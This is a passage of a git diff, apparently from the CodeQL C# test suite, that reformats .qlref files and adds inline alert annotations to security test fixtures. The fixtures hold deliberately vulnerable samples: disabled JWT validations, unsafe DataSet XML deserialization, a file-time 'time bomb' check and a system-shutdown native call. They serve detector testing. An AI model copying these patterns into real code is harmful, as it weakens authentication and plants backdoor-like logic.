BUG // $ Alert[cs/json-webtoken-handler/security-validations-disabled] ValidateTokenReplay = false, RequireSignedTokens = false, - RequireAudience = false, // BUG + RequireAudience = false, // BUG // $ Alert[cs/json-webtoken-handler/security-validations-disabled] SaveSigninToken = false }; } diff --git a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.qlref b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.qlref index ee07957fa06c..6e09f8b533ba 100644 --- a/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.qlref +++ b/csharp/ql/test/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.qlref @@ -1 +1,2 @@ -experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.ql \ No newline at end of file +query: experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/Serialization/DefiningDatasetRelatedType.qlref b/csharp/ql/test/experimental/Security Features/Serialization/DefiningDatasetRelatedType.qlref index 7283db95daf5..2000d5d88765 100644 --- a/csharp/ql/test/experimental/Security Features/Serialization/DefiningDatasetRelatedType.qlref +++ b/csharp/ql/test/experimental/Security Features/Serialization/DefiningDatasetRelatedType.qlref @@ -1 +1,2 @@ -experimental/Security Features/Serialization/DefiningDatasetRelatedType.ql \ No newline at end of file +query: experimental/Security Features/Serialization/DefiningDatasetRelatedType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.qlref b/csharp/ql/test/experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.qlref index 8a8632c6ee3b..767133e00a8e 100644 --- a/csharp/ql/test/experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.qlref +++ b/csharp/ql/test/experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.qlref @@ -1 +1,2 @@ -experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.ql \ No newline at end of file +query: experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.qlref b/csharp/ql/test/experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.qlref index 1593497c7932..62c0d0c79d22 100644 --- a/csharp/ql/test/experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.qlref +++ b/csharp/ql/test/experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.qlref @@ -1 +1,2 @@ -experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.ql \ No newline at end of file +query: experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/Serialization/XmlDeserializationWithDataSet.qlref b/csharp/ql/test/experimental/Security Features/Serialization/XmlDeserializationWithDataSet.qlref index 8054e46f929b..1d26399183e2 100644 --- a/csharp/ql/test/experimental/Security Features/Serialization/XmlDeserializationWithDataSet.qlref +++ b/csharp/ql/test/experimental/Security Features/Serialization/XmlDeserializationWithDataSet.qlref @@ -1 +1,2 @@ -experimental/Security Features/Serialization/XmlDeserializationWithDataSet.ql \ No newline at end of file +query: experimental/Security Features/Serialization/XmlDeserializationWithDataSet.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/Serialization/test0.cs b/csharp/ql/test/experimental/Security Features/Serialization/test0.cs index d2b2e772245a..a9efeb04ffe9 100644 --- a/csharp/ql/test/experimental/Security Features/Serialization/test0.cs +++ b/csharp/ql/test/experimental/Security Features/Serialization/test0.cs @@ -8,9 +8,9 @@ namespace DataSetSerializationTest { - public class DerivesFromDeprecatedType1 : XmlSerializer // warning:DefiningDatasetRelatedType.ql + public class DerivesFromDeprecatedType1 : XmlSerializer // warning:DefiningDatasetRelatedType.ql // $ Alert[cs/dataset-serialization/defining-dataset-related-type] { - public DataSet MyDataSet { get; set; } // bug:DefiningPotentiallyUnsafeXmlSerializer.ql + public DataSet MyDataSet { get; set; } // bug:DefiningPotentiallyUnsafeXmlSerializer.ql // $ Alert[cs/dataset-serialization/defining-potentially-unsafe-xml-serializer] public DerivesFromDeprecatedType1() { @@ -54,9 +54,9 @@ public override void WriteEndObject(XmlDictionaryWriter writer) { } */ [Serializable()] - public class AttributeSerializer01 // warning:DefiningDatasetRelatedType.ql + public class AttributeSerializer01 // warning:DefiningDatasetRelatedType.ql // $ Alert[cs/dataset-serialization/defining-dataset-related-type] { - private DataSet MyDataSet; // bug:DefiningPotentiallyUnsafeXmlSerializer.ql + private DataSet MyDataSet; // bug:DefiningPotentiallyUnsafeXmlSerializer.ql // $ Alert[cs/dataset-serialization/defining-potentially-unsafe-xml-serializer] AttributeSerializer01() { @@ -83,15 +83,15 @@ static void datatable_readxmlschema_01(string fileName) { DataTable newTable = new DataTable(); System.Xml.XmlTextReader reader = new System.Xml.XmlTextReader(fs); - newTable.ReadXmlSchema(reader); //bug:XmlDeserializationWithDataSet.ql + newTable.ReadXmlSchema(reader); //bug:XmlDeserializationWithDataSet.ql // $ Alert[cs/dataset-serialization/xml-deserialization-with-dataset] } } static void Main(string[] args) { - XmlSerializer x = new XmlSerializer(typeof(DataSet)); // bug:UnsafeTypeUsedDataContractSerializer.ql - XmlSerializer y = new XmlSerializer(typeof(AttributeSerializer01)); //bug:UnsafeTypeUsedDataContractSerializer.ql + XmlSerializer x = new XmlSerializer(typeof(DataSet)); // bug:UnsafeTypeUsedDataContractSerializer.ql // $ Alert[cs/dataset-serialization/unsafe-type-used-data-contract-serializer] + XmlSerializer y = new XmlSerializer(typeof(AttributeSerializer01)); //bug:UnsafeTypeUsedDataContractSerializer.ql // $ Alert[cs/dataset-serialization/unsafe-type-used-data-contract-serializer] Console.WriteLine("Hello World!"); } diff --git a/csharp/ql/test/experimental/Security Features/backdoor/DangerousNativeFunctionCall.qlref b/csharp/ql/test/experimental/Security Features/backdoor/DangerousNativeFunctionCall.qlref index 1215c001b40c..4a8dc07046fe 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/DangerousNativeFunctionCall.qlref +++ b/csharp/ql/test/experimental/Security Features/backdoor/DangerousNativeFunctionCall.qlref @@ -1 +1,2 @@ -experimental/Security Features/backdoor/DangerousNativeFunctionCall.ql \ No newline at end of file +query: experimental/Security Features/backdoor/DangerousNativeFunctionCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected b/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected index 95a491293ddb..e5773327060f 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected +++ b/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.expected @@ -1,12 +1,3 @@ -nodes -| test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | semmle.label | access to local variable lastWriteTime : DateTime | -| test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | semmle.label | call to method GetLastWriteTime : DateTime | -| test.cs:71:13:71:71 | call to method CompareTo | semmle.label | call to method CompareTo | -| test.cs:71:13:71:71 | call to method CompareTo : Int32 | semmle.label | call to method CompareTo : Int32 | -| test.cs:71:13:71:76 | ... >= ... | semmle.label | ... >= ... | -| test.cs:71:36:71:48 | access to local variable lastWriteTime | semmle.label | access to local variable lastWriteTime | -| test.cs:71:36:71:70 | call to method AddHours | semmle.label | call to method AddHours | -subpaths edges | test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | test.cs:71:36:71:48 | access to local variable lastWriteTime | provenance | | | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | provenance | | @@ -17,7 +8,16 @@ edges | test.cs:71:36:71:70 | call to method AddHours | test.cs:71:13:71:71 | call to method CompareTo | provenance | | | test.cs:71:36:71:70 | call to method AddHours | test.cs:71:13:71:71 | call to method CompareTo : Int32 | provenance | | | test.cs:71:36:71:70 | call to method AddHours | test.cs:71:36:71:70 | call to method AddHours | provenance | | +nodes +| test.cs:69:18:69:30 | access to local variable lastWriteTime : DateTime | semmle.label | access to local variable lastWriteTime : DateTime | +| test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | semmle.label | call to method GetLastWriteTime : DateTime | +| test.cs:71:13:71:71 | call to method CompareTo | semmle.label | call to method CompareTo | +| test.cs:71:13:71:71 | call to method CompareTo : Int32 | semmle.label | call to method CompareTo : Int32 | +| test.cs:71:13:71:76 | ... >= ... | semmle.label | ... >= ... | +| test.cs:71:36:71:48 | access to local variable lastWriteTime | semmle.label | access to local variable lastWriteTime | +| test.cs:71:36:71:70 | call to method AddHours | semmle.label | call to method AddHours | problems | test.cs:71:9:74:9 | if (...) ... | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:71:13:71:71 | call to method CompareTo | Possible TimeBomb logic triggered by an $@ that takes into account $@ from the $@ as part of the potential trigger. | test.cs:71:13:71:71 | call to method CompareTo | call to method CompareTo | test.cs:71:36:71:70 | call to method AddHours | offset | test.cs:69:34:69:76 | call to method GetLastWriteTime | last modification time of a file | | test.cs:71:9:74:9 | if (...) ... | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:71:13:71:71 | call to method CompareTo : Int32 | Possible TimeBomb logic triggered by an $@ that takes into account $@ from the $@ as part of the potential trigger. | test.cs:71:13:71:71 | call to method CompareTo | call to method CompareTo | test.cs:71:36:71:70 | call to method AddHours | offset | test.cs:69:34:69:76 | call to method GetLastWriteTime | last modification time of a file | | test.cs:71:9:74:9 | if (...) ... | test.cs:69:34:69:76 | call to method GetLastWriteTime : DateTime | test.cs:71:13:71:76 | ... >= ... | Possible TimeBomb logic triggered by an $@ that takes into account $@ from the $@ as part of the potential trigger. | test.cs:71:13:71:71 | call to method CompareTo | call to method CompareTo | test.cs:71:36:71:70 | call to method AddHours | offset | test.cs:69:34:69:76 | call to method GetLastWriteTime | last modification time of a file | +subpaths diff --git a/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.qlref b/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.qlref index f76817aa089e..c2b5b618cec9 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.qlref +++ b/csharp/ql/test/experimental/Security Features/backdoor/PotentialTimeBomb.qlref @@ -1 +1,2 @@ -experimental/Security Features/backdoor/PotentialTimeBomb.ql \ No newline at end of file +query: experimental/Security Features/backdoor/PotentialTimeBomb.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected b/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected index b8074b4fa636..010a2877589c 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected +++ b/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.expected @@ -1,4 +1,4 @@ edges nodes -subpaths problems +subpaths diff --git a/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.qlref b/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.qlref index d1d0d520d61e..767d3e6961af 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.qlref +++ b/csharp/ql/test/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.qlref @@ -1 +1,2 @@ -experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.ql \ No newline at end of file +query: experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/experimental/Security Features/backdoor/test.cs b/csharp/ql/test/experimental/Security Features/backdoor/test.cs index 1aecc80aa83f..c622eda8044e 100644 --- a/csharp/ql/test/experimental/Security Features/backdoor/test.cs +++ b/csharp/ql/test/experimental/Security Features/backdoor/test.cs @@ -29,7 +29,7 @@ class External void TestDangerousNativeFunctionCall() { - InitiateSystemShutdownExW(null, null, 0U, true, true, 2147745794U); // BUG : DangerousNativeFunctionCall + InitiateSystemShutdownExW(null, null, 0U, true, true, 2147745794U); // BUG : DangerousNativeFunctionCall // $ Alert[cs/backdoor/dangerous-native-functions] } ulong GetFvnHash(string s) diff --git a/csharp/ql/test/library-tests/arguments/PrintAst.qlref b/csharp/ql/test/library-tests/arguments/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/arguments/PrintAst.qlref +++ b/csharp/ql/test/library-tests/arguments/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/assignments/PrintAst.qlref b/csharp/ql/test/library-tests/assignments/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/assignments/PrintAst.qlref +++ b/csharp/ql/test/library-tests/assignments/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/attributes/PrintAst.qlref b/csharp/ql/test/library-tests/attributes/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/attributes/PrintAst.qlref +++ b/csharp/ql/test/library-tests/attributes/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/comments/PrintAst.qlref b/csharp/ql/test/library-tests/comments/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/comments/PrintAst.qlref +++ b/csharp/ql/test/library-tests/comments/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/compilations/CompilerError.qlref b/csharp/ql/test/library-tests/compilations/CompilerError.qlref index a0132abfe57b..4bceeaba10c1 100644 --- a/csharp/ql/test/library-tests/compilations/CompilerError.qlref +++ b/csharp/ql/test/library-tests/compilations/CompilerError.qlref @@ -1 +1 @@ -Diagnostics/CompilerError.ql \ No newline at end of file +query: Diagnostics/CompilerError.ql diff --git a/csharp/ql/test/library-tests/compilations/CompilerMessage.qlref b/csharp/ql/test/library-tests/compilations/CompilerMessage.qlref index 0628dcba52e5..c4a8ee06a014 100644 --- a/csharp/ql/test/library-tests/compilations/CompilerMessage.qlref +++ b/csharp/ql/test/library-tests/compilations/CompilerMessage.qlref @@ -1 +1 @@ -Diagnostics/CompilerMessage.ql \ No newline at end of file +query: Diagnostics/CompilerMessage.ql diff --git a/csharp/ql/test/library-tests/compilations/ExtractorError.qlref b/csharp/ql/test/library-tests/compilations/ExtractorError.qlref index 14290bb4ace5..d343d7778b82 100644 --- a/csharp/ql/test/library-tests/compilations/ExtractorError.qlref +++ b/csharp/ql/test/library-tests/compilations/ExtractorError.qlref @@ -1 +1 @@ -Diagnostics/ExtractorError.ql +query: Diagnostics/ExtractorError.ql diff --git a/csharp/ql/test/library-tests/compilations/ExtractorMessage.qlref b/csharp/ql/test/library-tests/compilations/ExtractorMessage.qlref index ce6ac3bff0ab..cedb003d69c3 100644 --- a/csharp/ql/test/library-tests/compilations/ExtractorMessage.qlref +++ b/csharp/ql/test/library-tests/compilations/ExtractorMessage.qlref @@ -1 +1 @@ -Diagnostics/ExtractorMessage.ql \ No newline at end of file +query: Diagnostics/ExtractorMessage.ql diff --git a/csharp/ql/test/library-tests/constructors/PrintAst.qlref b/csharp/ql/test/library-tests/constructors/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/constructors/PrintAst.qlref +++ b/csharp/ql/test/library-tests/constructors/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/conversion/operator/PrintAst.qlref b/csharp/ql/test/library-tests/conversion/operator/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/conversion/operator/PrintAst.qlref +++ b/csharp/ql/test/library-tests/conversion/operator/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/csharp11/PrintAst.qlref b/csharp/ql/test/library-tests/csharp11/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/csharp11/PrintAst.qlref +++ b/csharp/ql/test/library-tests/csharp11/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/csharp6/PrintAst.qlref b/csharp/ql/test/library-tests/csharp6/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/csharp6/PrintAst.qlref +++ b/csharp/ql/test/library-tests/csharp6/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/csharp7.1/PrintAst.qlref b/csharp/ql/test/library-tests/csharp7.1/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/csharp7.1/PrintAst.qlref +++ b/csharp/ql/test/library-tests/csharp7.1/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/csharp7.2/PrintAst.qlref b/csharp/ql/test/library-tests/csharp7.2/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/csharp7.2/PrintAst.qlref +++ b/csharp/ql/test/library-tests/csharp7.2/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/csharp7.3/PrintAst.qlref b/csharp/ql/test/library-tests/csharp7.3/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/csharp7.3/PrintAst.qlref +++ b/csharp/ql/test/library-tests/csharp7.3/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/csharp7/PrintAst.qlref b/csharp/ql/test/library-tests/csharp7/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/csharp7/PrintAst.qlref +++ b/csharp/ql/test/library-tests/csharp7/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/csharp8/PrintAst.qlref b/csharp/ql/test/library-tests/csharp8/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/csharp8/PrintAst.qlref +++ b/csharp/ql/test/library-tests/csharp8/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/csharp9/PrintAst.qlref b/csharp/ql/test/library-tests/csharp9/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/csharp9/PrintAst.qlref +++ b/csharp/ql/test/library-tests/csharp9/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/dataflow/implicittostring/PrintAst.qlref b/csharp/ql/test/library-tests/dataflow/implicittostring/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/dataflow/implicittostring/PrintAst.qlref +++ b/csharp/ql/test/library-tests/dataflow/implicittostring/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/dataflow/tuples/PrintAst.qlref b/csharp/ql/test/library-tests/dataflow/tuples/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/dataflow/tuples/PrintAst.qlref +++ b/csharp/ql/test/library-tests/dataflow/tuples/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/definitions/PrintAst.qlref b/csharp/ql/test/library-tests/definitions/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/definitions/PrintAst.qlref +++ b/csharp/ql/test/library-tests/definitions/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/definitions/definitions.qlref b/csharp/ql/test/library-tests/definitions/definitions.qlref index 11e03f5ab070..89fab02d1037 100644 --- a/csharp/ql/test/library-tests/definitions/definitions.qlref +++ b/csharp/ql/test/library-tests/definitions/definitions.qlref @@ -1 +1 @@ -definitions.ql \ No newline at end of file +query: definitions.ql diff --git a/csharp/ql/test/library-tests/delegates/PrintAst.qlref b/csharp/ql/test/library-tests/delegates/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/delegates/PrintAst.qlref +++ b/csharp/ql/test/library-tests/delegates/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/diagnostics/DiagnosticExtractorErrors.qlref b/csharp/ql/test/library-tests/diagnostics/DiagnosticExtractorErrors.qlref index 7068705cc1be..498f8bf078e9 100644 --- a/csharp/ql/test/library-tests/diagnostics/DiagnosticExtractorErrors.qlref +++ b/csharp/ql/test/library-tests/diagnostics/DiagnosticExtractorErrors.qlref @@ -1 +1 @@ -Diagnostics/DiagnosticExtractionErrors.ql +query: Diagnostics/DiagnosticExtractionErrors.ql diff --git a/csharp/ql/test/library-tests/diagnostics/ExtractedFiles.qlref b/csharp/ql/test/library-tests/diagnostics/ExtractedFiles.qlref index e900e9c5314b..58bc903a431d 100644 --- a/csharp/ql/test/library-tests/diagnostics/ExtractedFiles.qlref +++ b/csharp/ql/test/library-tests/diagnostics/ExtractedFiles.qlref @@ -1 +1 @@ -Diagnostics/ExtractedFiles.ql +query: Diagnostics/ExtractedFiles.ql diff --git a/csharp/ql/test/library-tests/dynamic/PrintAst.qlref b/csharp/ql/test/library-tests/dynamic/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/dynamic/PrintAst.qlref +++ b/csharp/ql/test/library-tests/dynamic/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/enums/PrintAst.qlref b/csharp/ql/test/library-tests/enums/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/enums/PrintAst.qlref +++ b/csharp/ql/test/library-tests/enums/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/events/PrintAst.qlref b/csharp/ql/test/library-tests/events/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/events/PrintAst.qlref +++ b/csharp/ql/test/library-tests/events/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/exceptions/PrintAst.qlref b/csharp/ql/test/library-tests/exceptions/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/exceptions/PrintAst.qlref +++ b/csharp/ql/test/library-tests/exceptions/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/expressions/PrintAst.qlref b/csharp/ql/test/library-tests/expressions/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/expressions/PrintAst.qlref +++ b/csharp/ql/test/library-tests/expressions/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/extension/PrintAst.qlref b/csharp/ql/test/library-tests/extension/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/extension/PrintAst.qlref +++ b/csharp/ql/test/library-tests/extension/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/fields/PrintAst.qlref b/csharp/ql/test/library-tests/fields/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/fields/PrintAst.qlref +++ b/csharp/ql/test/library-tests/fields/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/filters/ClassifyFiles/ClassifyFiles.qlref b/csharp/ql/test/library-tests/filters/ClassifyFiles/ClassifyFiles.qlref index 638bf4567627..612f5dfb3322 100644 --- a/csharp/ql/test/library-tests/filters/ClassifyFiles/ClassifyFiles.qlref +++ b/csharp/ql/test/library-tests/filters/ClassifyFiles/ClassifyFiles.qlref @@ -1 +1 @@ -filters/ClassifyFiles.ql \ No newline at end of file +query: filters/ClassifyFiles.ql diff --git a/csharp/ql/test/library-tests/generics/PrintAst.qlref b/csharp/ql/test/library-tests/generics/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/generics/PrintAst.qlref +++ b/csharp/ql/test/library-tests/generics/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/goto/PrintAst.qlref b/csharp/ql/test/library-tests/goto/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/goto/PrintAst.qlref +++ b/csharp/ql/test/library-tests/goto/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/indexers/PrintAst.qlref b/csharp/ql/test/library-tests/indexers/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/indexers/PrintAst.qlref +++ b/csharp/ql/test/library-tests/indexers/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/initializers/PrintAst.qlref b/csharp/ql/test/library-tests/initializers/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/initializers/PrintAst.qlref +++ b/csharp/ql/test/library-tests/initializers/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/linq/PrintAst.qlref b/csharp/ql/test/library-tests/linq/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/linq/PrintAst.qlref +++ b/csharp/ql/test/library-tests/linq/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/members/PrintAst.qlref b/csharp/ql/test/library-tests/members/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/members/PrintAst.qlref +++ b/csharp/ql/test/library-tests/members/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/methods/PrintAst.qlref b/csharp/ql/test/library-tests/methods/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/methods/PrintAst.qlref +++ b/csharp/ql/test/library-tests/methods/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/nameof/PrintAst.qlref b/csharp/ql/test/library-tests/nameof/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/nameof/PrintAst.qlref +++ b/csharp/ql/test/library-tests/nameof/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/namespaces/PrintAst.qlref b/csharp/ql/test/library-tests/namespaces/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/namespaces/PrintAst.qlref +++ b/csharp/ql/test/library-tests/namespaces/PrintAst.qlref @@ -1 +1 @@ -shared/PrintAst.ql \ No newline at end of file +query: shared/PrintAst.ql diff --git a/csharp/ql/test/library-tests/nestedtypes/PrintAst.qlref b/csharp/ql/test/library-tests/nestedtypes/PrintAst.qlref index f867dd01f9f8..1db66182b0ab 100644 --- a/csharp/ql/test/library-tests/nestedtypes/PrintAst.qlref +++ b/csharp/ql/test/library-tests/nestedtypes/PrintAst.qlref @@ -1 +1 @@ 